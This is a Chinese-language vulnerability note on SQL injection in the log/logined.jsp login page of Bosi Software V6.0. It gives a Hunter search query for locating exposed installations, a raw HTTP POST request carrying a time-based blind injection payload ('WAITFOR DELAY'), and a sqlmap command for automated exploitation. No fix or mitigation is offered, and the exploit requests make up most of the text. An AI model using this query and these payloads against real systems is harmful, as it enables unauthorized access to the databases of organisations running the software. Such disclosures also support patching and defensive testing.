# 博斯软件V6.0 存在 sql 注入

# 一、漏洞简介
福建博思软件股份有限公司博斯软件V6.0 log/logined.jsp存在SQL注入漏洞。

# 二、影响版本
+ 博斯软件V6.0

# 三、资产测绘
+ hunter`web.title:"欢迎使用 博斯软件"`
+ 特征

![1697813092548-472a2527-ceb8-41ff-874b-32ce4c0e7ebe.png](./img/qesLgT3zkCECCWG7/1697813092548-472a2527-ceb8-41ff-874b-32ce4c0e7ebe-167743.png)

# 四、漏洞复现
```java
POST /log/logined.jsp HTTP/1.1
Content-Type: application/x-www-form-urlencoded
X-Requested-With: XMLHttpRequest
Cookie: JSESSIONID=80D835813F9733E867790648CBAA0EC6
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate
Content-Length: 106
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4298.0 Safari/537.36
Host: xx.xx.xx.xx
Connection: Keep-alive

Submit=-1A&account=-1password=g-1';WAITFOR DELAY '0:0:5'--
```

![1697813144963-54dfd143-ad16-466e-accc-847ad43268c6.png](./img/qesLgT3zkCECCWG7/1697813144963-54dfd143-ad16-466e-accc-847ad43268c6-568851.png)

sqlmap

```java
POST /log/logined.jsp HTTP/1.1
Content-Type: application/x-www-form-urlencoded
X-Requested-With: XMLHttpRequest
Cookie: JSESSIONID=80D835813F9733E867790648CBAA0EC6
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate
Content-Length: 106
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4298.0 Safari/537.36
Host: xx.xx.xx.xx
Connection: Keep-alive

Submit=-1A&account=-1password=g-2
```

```java
sqlmap -r 1.txt --batch --level 3 --thread 5
```

![1697813586437-c2b66328-c97f-4130-b663-8b4fe9ae5e07.png](./img/qesLgT3zkCECCWG7/1697813586437-c2b66328-c97f-4130-b663-8b4fe9ae5e07-922009.png)



> 更新: 2024-02-29 23:55:47  
> 原文: <https://www.yuque.com/xiaokp7/ocvun2/zprm44mso2ysykrg>